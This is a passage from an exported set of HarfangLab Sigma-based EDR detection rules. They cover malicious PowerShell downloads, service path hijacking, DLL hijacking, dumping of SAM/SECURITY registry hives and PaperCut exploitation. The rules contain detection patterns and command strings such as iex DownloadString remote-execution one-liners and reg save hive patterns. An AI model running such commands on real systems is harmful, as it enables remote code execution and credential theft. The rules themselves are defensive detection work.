System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))\n 
PowershellCommand|contains|all:\n - 'chocolatey.org/install.ps1'\n - 'DownloadString'\n - '::SecurityProtocol'\n - ' 3072'\n\n exclusion_chocolatey_upgrade:\n PowershellCommand|contains|all:\n - 'https://chocolatey.org/install.ps1'\n - '; choco upgrade -y'\n - '; Read-Host'\n - 'Type ENTER to exit'\n\n exclusion_microsoft_monitoring_agent:\n ProcessCommandLine: '?:\\Windows\\system32\\windowspowershell\\v1.0\\powershell.exe -NoLogo -Command ? ??:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\Monitoring Host Temporary Files *\\LogEndToEndEvent.ps1?'\n\n exclusion_microsoft_system_center:\n ProcessImage: '?:\\Program Files\\Microsoft System Center\\Operations Manager\\Server\\MonitoringHost.exe'\n\n exclusion_powershell_utility:\n PowershellCommand|contains|all:\n - 'GUID=\"1DA87E53-152B-403E-98DC-74D7B4D63D59\"'\n - 'Author=\"Microsoft Corporation\"'\n - 'CmdletsToExport= \"Format-List\", \"Format-Custom\", \"Format-Table\", \"Format-Wide\",'\n - 'NestedModules=\"Microsoft.PowerShell.Commands.Utility.dll\",\"Microsoft.PowerShell.Utility.psm1\"'\n\n exclusion_ms_atp:\n PowershellScriptPath: '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Downloads\\PSScript_*.ps1'\n\n exclusion_azure_ad_connect_health_adfs_agent:\n PowershellCommand|contains|all:\n - 'http://nist.time.gov/actualtime.cgi'\n - '$currentRtsTimeUtc = (New-Object -TypeName DateTime -ArgumentList (1970, 1, 1)).AddMilliseconds(([Xml]$request.Content).timestamp.time / 1000);'\n - 'Test-AdfsServerHealth'\n\n exclusion_poshssh:\n PowershellCommand|contains|all:\n - 'function Get-PoshSSHModVersion'\n - '$installed = (Get-Module -Name ?posh-SSH?).Version'\n - 'https://raw.github.com/darkoperator/Posh-SSH/master/'\n - '/Posh-SSH.psd1'\n - 'Write-Error ?Unable to locate Posh-SSH.?'\n\n # https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/run-analyzer-windows?view=o365-worldwide\n exclusion_mdeanalyzer:\n PowershellCommand|contains|all:\n - 
'# Initialize XML log - for consumption by external parser'\n - '$script:xmlDoc = [xml]\"\"'\n - 'HKLM:\\SOFTWARE\\Microsoft\\Windows Advanced Threat Protection'\n - 'Write-Host -ForegroundColor Green \"Please enter the full path to the document that was used during log collection. For example C:\\Users\\John Doe\\Desktop\\report.docx\"'\n - 'function Get-DLPEA {'\n - 'function Test-WPRError($ExitCode) {'\n\n exclusion_flarevm:\n PowershellScriptPath: '?:\\ProgramData\\_VM\\vm.common\\vm.common.psm1'\n PowershellCommand|contains|all:\n - '# Determine if file or directory should show item in right-click menu'\n - 'New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null'\n - 'VM Chocolatey Version'\n - 'VM Boxstarter Version'\n - '$chocoInfo = choco --version'\n - 'installedPackages = choco list -r'\n - '# Function for setting Services to manual startup'\n\n exclusion_ixbus:\n - ProcessGrandparentCommandLine: '*\\iXBus Serveur\\Plugins\\\\*\\service.exe'\n - PowershellScriptPath: '?:\\SRCI\\iXBs_Applications\\iXBus Serveur\\Framework\\\\*\\iXBs_InterfaceGF\\iXBs_*.psm1'\n\n exclusion_tanium:\n ProcessAncestors|contains: '|?:\\Program Files (x86)\\Tanium\\Tanium Client\\TaniumCX.exe|'\n\n exclusion_amazon:\n PowershellScriptPath: '?:\\ProgramData\\Amazon\\SSM\\InstanceData\\\\*\\document\\orchestration\\\\*\\PatchWindows\\_script.ps1'\n\n exclusion_national_instruments:\n ProcessGrandparentImage: '?:\\Program Files\\National Instruments\\Shared\\Skyline\\RabbitMQ\\erl-*\\bin\\erlsrv.exe'\n\n exclusion_nsclient:\n ProcessGrandparentImage: '?:\\Program Files\\NSClient++\\nscp.exe'\n\n exclusion_prtg:\n ProcessImage: '?:\\Program Files (x86)\\PRTG Network Monitor\\PowerShellScriptRunner.exe'\n ProcessParentImage: '?:\\Program Files (x86)\\PRTG Network Monitor\\PRTG Probe.exe'\n\n exclusion_cyberwatch:\n ProcessParentImage: '?:\\Program Files\\CYBERWATCH SAS\\CyberwatchAgent\\cyberwatch-agent.exe'\n\n exclusion_sillage:\n PowershellScriptPath: 
'?:\\sillage\\sillageMAJ.ps1'\n ProcessParentCommandLine|startswith: '?:\\windows\\system32\\cmd.exe /K CALL ?:\\sillage\\Sillage.bat '\n\n exclusion_intune:\n ProcessParentImage: '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\AgentExecutor.exe'\n\n exclusion_alticap:\n PowershellScriptPath: '?:\\ProgramData\\Alticap\\rrd\\\\*.ps1'\n\n exclusion_siemens:\n PowershellScriptPath:\n - '?:\\Program Files\\Siemens\\LMS\\scripts\\CommonPSFunctions.psm1'\n - '?:\\Program Files\\Siemens\\syngo\\OperationalManagement\\HealthCheck\\HCx.ps1'\n\n # https://arpege.fr/\n exclusion_arpege:\n - PowershellScriptPath: '?:\\ARPEGE*\\produit\\admin\\res\\Modules_Persos\\Common-Commands\\Common-Commands.psm1'\n - ProcessParentCommandLine:\n - '?:\\Windows\\SYSTEM32\\cmd.exe /c ?:\\ARPEGE*\\produit\\admin\\Sauvegarde.bat'\n - '?:\\Windows\\SYSTEM32\\cmd.exe /c ?:\\ARPEGE*\\produit\\admin\\Sauvegarde.bat -Wait'\n\n exclusion_ninjaone:\n PowershellScriptPath: '?:\\ProgramData\\NinjaRMMAgent\\scripting\\customscript_gen_*.ps1'\n\n exclusion_itsplatform:\n ProcessParentImage: '?:\\Program Files (x86)\\ITSPlatform\\agentcore\\platform-agent-core.exe'\n\n exclusion_nodejs_parent:\n PowershellCommand|contains: 'iex ((New-Object System.Net.WebClient).DownloadString(?https://chocolatey.org/install.ps1?));'\n ProcessParentCommandLine:\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\nodejs\\install_tools.bat'\n - '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\Program Files\\nodejs\\install_tools.bat'\n exclusion_nodejs_grandparent:\n PowershellCommand|contains: 'iex ((New-Object System.Net.WebClient).DownloadString(?https://chocolatey.org/install.ps1?));'\n ProcessGrandparentCommandLine:\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\nodejs\\install_tools.bat'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\Program Files\\nodejs\\install_tools.bat'\n\n exclusion_vcpkg:\n # https://github.com/microsoft/vcpkg-ce/blob/main/assets/scripts/ce.ps1\n - Sha256:\n - 
'90de3d6b442c1370644432e0bacd937023e2485882c1621cc2158e7a983a7996'\n - 'e03a66d7862e438aea9e75099cc7f46149b5d594ea2ba482a9d93c9d82d44270'\n - '7d370f1580f5c9a1fca316049015d6ca4d5ab83a467e142b2c35d8348961ad4f'\n - ProcessCommandLine:\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -ExecutionPolicy Unrestricted -Command iex (get-content \"?:\\Program Files\\Microsoft Visual Studio\\\\*\\VC\\vcpkg\\vcpkg-init.cmd\" -raw)#'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -ExecutionPolicy Unrestricted -Command iex (get-content \"?:\\Program Files (x86)\\Microsoft Visual Studio\\\\*\\VC\\vcpkg\\vcpkg-init.cmd\" -raw)#'\n - '?:\\Program Files\\PowerShell\\7\\pwsh.exe -NoProfile -ExecutionPolicy Unrestricted -Command iex (get-content \"?:\\Program Files\\Microsoft Visual Studio\\\\*\\VC\\vcpkg\\vcpkg-init.cmd\" -raw)#'\n - '?:\\Program Files\\PowerShell\\7\\pwsh.exe -NoProfile -ExecutionPolicy Unrestricted -Command iex (get-content \"?:\\Program Files (x86)\\Microsoft Visual Studio\\\\*\\VC\\vcpkg\\vcpkg-init.cmd\" -raw)#'\n\n exclusion_ansible:\n # https://github.com/sergeycherepanov/devbrew/blob/master/ansible/ansible/executor/powershell/bootstrap_wrapper.ps1\n Sha256: 'c38ed3d1c2ad1af1755a9eee278018ed5fd8546f77fe685f60e4b8a40fe939c2'\n\n condition: ((exec and download) or (assembly_load and download) or decompress_payload or nslookup) and not 1 of exclusion_*\nlevel: medium\n#level: high\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "481011ca-b57e-4e3c-9c28-45b01b5589dd",
"rule_name": "Possible Execution of a Malicious PowerShell Script",
"rule_description": "Detects suspicious patterns in PowerShell scripts that can indicate the execution of malicious code.\nThere is functionality in PowerShell that is commonly abused by attackers, such as downloading data (payloads) and executing subsequent PowerShell code from an obfuscated first stage.\nIt is recommended to read the PowerShell script to determine its intent. If the PowerShell script is benign, it is highly recommended to whitelist the script to avoid false positives.\n",
"rule_creation_date": "2021-06-25",
"rule_modified_date": "2025-05-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4810ee12-e776-458e-8cb5-280d7850f8dd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075442Z",
"creation_date": "2026-03-23T11:45:34.075444Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075448Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe",
"https://attack.mitre.org/techniques/T1574/011/"
],
"name": "t1574_011_powershell_registered_as_service_path.yml",
"content": "title: Service Binary Path Modified to powershell.exe\nid: 4810ee12-e776-458e-8cb5-280d7850f8dd\ndescription: |\n Detects the modification of a service's binary path to point to powershell.exe.\n This technique can be used by adversaries to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\n It is recommended to investigate the new binary path as well as the binary performing the modification to look for malicious behaviors.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe\n - https://attack.mitre.org/techniques/T1574/011/\ndate: 2022/12/23\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.011\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\\\*\\ImagePath'\n Details|endswith: 'powershell.exe'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4810ee12-e776-458e-8cb5-280d7850f8dd",
"rule_name": "Service Binary Path Modified to powershell.exe",
"rule_description": "Detects the modification of a service's binary path to point to powershell.exe.\nThis technique can be used by adversaries to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\nIt is recommended to investigate the new binary path as well as the binary performing the modification to look for malicious behaviors.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4834c68c-17e1-41ea-aad1-8b8221b11796",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080295Z",
"creation_date": "2026-03-23T11:45:34.080297Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080301Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rdvghelper.yml",
"content": "title: DLL Hijacking via rdvghelper.exe\nid: 4834c68c-17e1-41ea-aad1-8b8221b11796\ndescription: |\n Detects potential Windows DLL Hijacking via rdvghelper.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rdvghelper.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dwmapi.dll'\n - '\\WINSTA.dll'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4834c68c-17e1-41ea-aad1-8b8221b11796",
"rule_name": "DLL Hijacking via rdvghelper.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rdvghelper.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "48702459-2abb-4d6e-8682-b9ca12feb9f0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075043Z",
"creation_date": "2026-03-23T11:45:34.075045Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075049Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/offsecginger/koadic/blob/main/data/implant/gather/hashdump_sam.js",
"https://attack.mitre.org/techniques/T1003/",
"https://lolbas-project.github.io/lolbas/Binaries/Reg/"
],
"name": "t1003_registry_extract.yml",
"content": "title: Sensitive Registry Hive Dumped\nid: 48702459-2abb-4d6e-8682-b9ca12feb9f0\ndescription: |\n Detects when reg.exe binary saves/dumps sensitive hives (SAM, SECURITY, SYSTEM)\n Koadic, among many others, uses this to dump the syskey.\n It is recommended to investigate the parent process for suspicious activities, as well to look for the subsequent unwanted usage of compromised credentials on others hosts.\nreferences:\n - https://github.com/offsecginger/koadic/blob/main/data/implant/gather/hashdump_sam.js\n - https://attack.mitre.org/techniques/T1003/\n - https://lolbas-project.github.io/lolbas/Binaries/Reg/\ndate: 2020/10/06\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1078\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Reg\n - classification.Windows.Behavior.Collection\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_binary:\n - Image|endswith: '\\reg.exe'\n - OriginalFileName: 'reg.exe'\n selection_commandline_action:\n CommandLine|contains:\n - ' save '\n - ' export '\n selection_commandline_hivename:\n CommandLine|contains:\n - '\\SAM '\n - '\\SAM\\ '\n - '\\SECURITY '\n - '\\SECURITY\\ '\n - '\\SECURITY\\policy\\secrets '\n - '\\SYSTEM ' # This hive is necessary for decrypting ntds.dit\n - '\\SYSTEM\\ '\n - '\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\JD '\n - '\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Skew1 '\n - '\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\GBG '\n - '\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Data '\n exclusion_rapid7:\n ParentImage: '?:\\Program Files\\Rapid7\\Insight Agent\\components\\insight_agent\\\\*\\ir_agent.exe'\n exclusion_trendmicro:\n CommandLine|endswith: '?:\\ProgramData\\Trend Micro\\Deep Security Agent\\\\*\\reg_gp_cmd.txt'\n\n exclusion_trendmicro_2:\n # C:\\Windows\\Temp\\qvwsbM1\\g1AxB76\\rp_main.exe\n 
ProcessGrandparentImage|endswith: '\\rp_main.exe'\n # reg export HKLM\\SOFTWARE\\Microsoft\\Security Center C:\\WINDOWS\\TEMP\\qvwsbM1\\g1AxB76\\wsc32.reg /reg:32\n # reg export HKLM\\SOFTWARE\\Microsoft\\Security Center C:\\WINDOWS\\TEMP\\waCxI8t\\VkBd5E8\\wsc64.reg /reg:64\n\n ProcessCommandLine|contains|all:\n - 'HKLM\\SOFTWARE\\Microsoft\\Security Center '\n - '\\wsc'\n - '/reg:'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "48702459-2abb-4d6e-8682-b9ca12feb9f0",
"rule_name": "Sensitive Registry Hive Dumped",
"rule_description": "Detects when the reg.exe binary saves/dumps sensitive hives (SAM, SECURITY, SYSTEM).\nKoadic, among many others, uses this to dump the syskey.\nIt is recommended to investigate the parent process for suspicious activities, as well as to look for the subsequent unwanted use of compromised credentials on other hosts.\n",
"rule_creation_date": "2020-10-06",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "487e1cf1-d661-410e-b8f6-9870b391d67e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588841Z",
"creation_date": "2026-03-23T11:45:34.588845Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588852Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_pacjsworker.yml",
"content": "title: DLL Hijacking via pacjsworker.exe\nid: 487e1cf1-d661-410e-b8f6-9870b391d67e\ndescription: |\n Detects potential Windows DLL Hijacking via pacjsworker.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'pacjsworker.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\WINHTTP.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "487e1cf1-d661-410e-b8f6-9870b391d67e",
"rule_name": "DLL Hijacking via pacjsworker.exe",
"rule_description": "Detects potential Windows DLL Hijacking via pacjsworker.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "488f01c4-9b5e-4099-839c-aaa87e4afd58",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092317Z",
"creation_date": "2026-03-23T11:45:34.092320Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092324Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software",
"https://www.bleepingcomputer.com/news/security/exploit-released-for-papercut-flaw-abused-to-hijack-servers-patch-now/",
"https://attack.mitre.org/techniques/T1190/"
],
"name": "t1190_papercut_exploitation.yml",
"content": "title: Suspicious Process Spawned by PaperCut Server\nid: 488f01c4-9b5e-4099-839c-aaa87e4afd58\ndescription: |\n Detects the execution of a suspicious process (such as script interpreters like PowerShell or W) by the PaperCut server process.\n This can be the result of the exploitation of the CVE-2023-27350 and CVE-2023-27351 vulnerabilities that allow an unauthenticated user to execute code as SYSTEM on the server.\n It is recommended to investigate the spawned process, its command-line and any scripts it might have executed to determine legitimacy.\nreferences:\n - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software\n - https://www.bleepingcomputer.com/news/security/exploit-released-for-papercut-flaw-abused-to-hijack-servers-patch-now/\n - https://attack.mitre.org/techniques/T1190/\ndate: 2023/04/26\nmodified: 2025/03/18\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2023-27350\n - classification.Windows.Exploit.CVE-2023-27351\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\pc-app.exe'\n Image|endswith:\n - '\\cmd.exe'\n - '\\powershell.exe'\n - '\\pwsh.exe'\n - '\\certutil.exe'\n - '\\wmic.exe'\n - '\\msiexec.exe'\n - '\\rundll32.exe'\n - '\\cscript.exe'\n - '\\wscript.exe'\n - '\\mshta.exe'\n - '\\regsvr32.exe'\n - '\\curl.exe'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "488f01c4-9b5e-4099-839c-aaa87e4afd58",
"rule_name": "Suspicious Process Spawned by PaperCut Server",
"rule_description": "Detects the execution of a suspicious process (such as script interpreters like PowerShell or W) by the PaperCut server process.\nThis can be the result of the exploitation of the CVE-2023-27350 and CVE-2023-27351 vulnerabilities that allow an unauthenticated user to execute code as SYSTEM on the server.\nIt is recommended to investigate the spawned process, its command-line and any scripts it might have executed to determine legitimacy.\n",
"rule_creation_date": "2023-04-26",
"rule_modified_date": "2025-03-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1190"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "489d592b-0a46-401a-8296-cb95d0abe49a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598546Z",
"creation_date": "2026-03-23T11:45:34.598549Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598557Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
